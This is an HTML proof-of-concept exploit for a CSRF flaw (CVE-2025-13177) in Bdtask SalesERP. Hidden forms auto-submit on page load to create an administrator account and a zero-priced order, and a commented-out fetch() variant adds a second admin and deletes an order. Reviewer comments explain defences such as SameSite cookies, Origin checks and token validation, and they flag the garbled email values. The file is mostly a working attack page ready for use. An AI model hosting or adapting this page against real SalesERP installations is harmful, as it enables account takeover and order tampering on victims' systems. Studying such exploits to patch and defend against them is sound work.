<!-- CSRF PoC for CVE-2025-13177 - Bdtask CodeCanyon SalesERP -->
<!-- This PoC demonstrates a CSRF attack against the SalesERP user-management and order endpoints -->
<!DOCTYPE html>
<html>
<head>
<title>SalesERP CSRF Attack PoC</title>
<style>
body { font-family: Arial, sans-serif; padding: 20px; }
/* The forms are hidden from the viewer; they are submitted by the script below, not by the user. */
.malicious-form { display: none; }
.info { color: #666; font-size: 12px; }
</style>
</head>
<body>
<h2>CVE-2025-13177 CSRF PoC</h2>
<p class="info">Target: Bdtask/CodeCanyon SalesERP</p>
<!-- "target-server" in the form actions is a placeholder host. A cross-site POST like this is only
     accepted because the browser attaches the victim's existing SalesERP session cookie; a cookie with
     SameSite=Lax/Strict, or a server-side Origin/Referer check, would stop it regardless of the body. -->
<!-- Auto-submit form targeting SalesERP user creation endpoint -->
<form id="csrfForm" class="malicious-form" action="http://target-server/saleserp/index.php/admin/user/create" method="POST">
<input type="hidden" name="username" value="attacker_created">
<!-- NOTE(review): the email value below is split across two lines and reads "[email protected]";
     this looks like an email-obfuscation/extraction artifact rather than the original literal - confirm. -->
<input type="hidden" name="email" value="
[email protected]">
<input type="hidden" name="password" value="P@ssw0rd123">
<input type="hidden" name="user_role" value="admin">
<!-- Defender note: csrf_token is submitted EMPTY. The defect being demonstrated is that the server still
     processes the request; rejecting any request whose token is missing or does not match the
     session-bound token closes this path. -->
<input type="hidden" name="csrf_token" value="">
</form>
<!-- Form targeting SalesERP order processing -->
<!-- This form carries no csrf_token field at all, so the same missing server-side check applies here. -->
<form id="orderForm" class="malicious-form" action="http://target-server/saleserp/index.php/sales/order/create" method="POST">
<input type="hidden" name="customer_id" value="999">
<input type="hidden" name="product_ids" value="1,2,3">
<input type="hidden" name="quantity" value="100">
<input type="hidden" name="total_amount" value="0">
</form>
<script>
// Auto-submit both forms when page loads
// Submits the two hidden forms once the page has loaded.
// Detection: each resulting POST arrives at the server with a cross-site Origin/Referer
// (this page's origin) and Sec-Fetch-Site: cross-site, which is what an Origin check or
// a SameSite cookie policy keys on.
window.onload = function() {
console.log('CSRF PoC executing...');
// First POST: the user-creation form (#csrfForm).
document.getElementById('csrfForm').submit();
// Second POST, scheduled one second later: the order form (#orderForm).
setTimeout(function() {
document.getElementById('orderForm').submit();
}, 1000);
};
</script>
<p>Redirecting...</p>
<script>
// Alternative: Use fetch API for more stealthy attack
/**
 * Sends the same kind of cross-site POSTs via fetch() instead of form submission.
 *
 * Defender notes:
 * - `credentials: 'include'` is what makes this CSRF: the browser attaches the victim's
 *   session cookie to a cross-origin request. SameSite=Lax/Strict cookies prevent that.
 * - The body is application/x-www-form-urlencoded with no custom headers, so this is a
 *   CORS "simple request" and no preflight is issued; requiring a custom header or
 *   validating Origin/Referer on the server would reject it.
 * - Neither request includes a csrf_token field; a server that validates the token fails both.
 * - The response is opaque cross-origin, so the "Request sent" log below does not
 *   indicate whether the server actually accepted the request.
 */
async function exploitCSRF() {
const targets = [
{
url: 'http://target-server/saleserp/index.php/admin/user/create',
data: new URLSearchParams({
'username': 'hacked_user',
// NOTE(review): the email literal is split across two lines and reads "[email protected]";
// this looks like an email-obfuscation/extraction artifact rather than the original value - confirm.
'email': '
[email protected]',
'password': 'Hacked123!',
'user_role': 'admin'
})
},
{
url: 'http://target-server/saleserp/index.php/sales/order/delete/1',
data: new URLSearchParams({
'confirm': 'yes'
})
}
];
for (const target of targets) {
try {
await fetch(target.url, {
method: 'POST',
credentials: 'include',
headers: {
'Content-Type': 'application/x-www-form-urlencoded',
},
body: target.data
});
// Logged on send, not on success - the cross-origin response cannot be read here.
console.log('Request sent to: ' + target.url);
} catch (e) {
// Network-level failures only; an HTTP error status does not reject fetch().
console.error('Error:', e);
}
}
}
// Uncomment to use fetch-based attack
// exploitCSRF();
</script>
</body>
</html>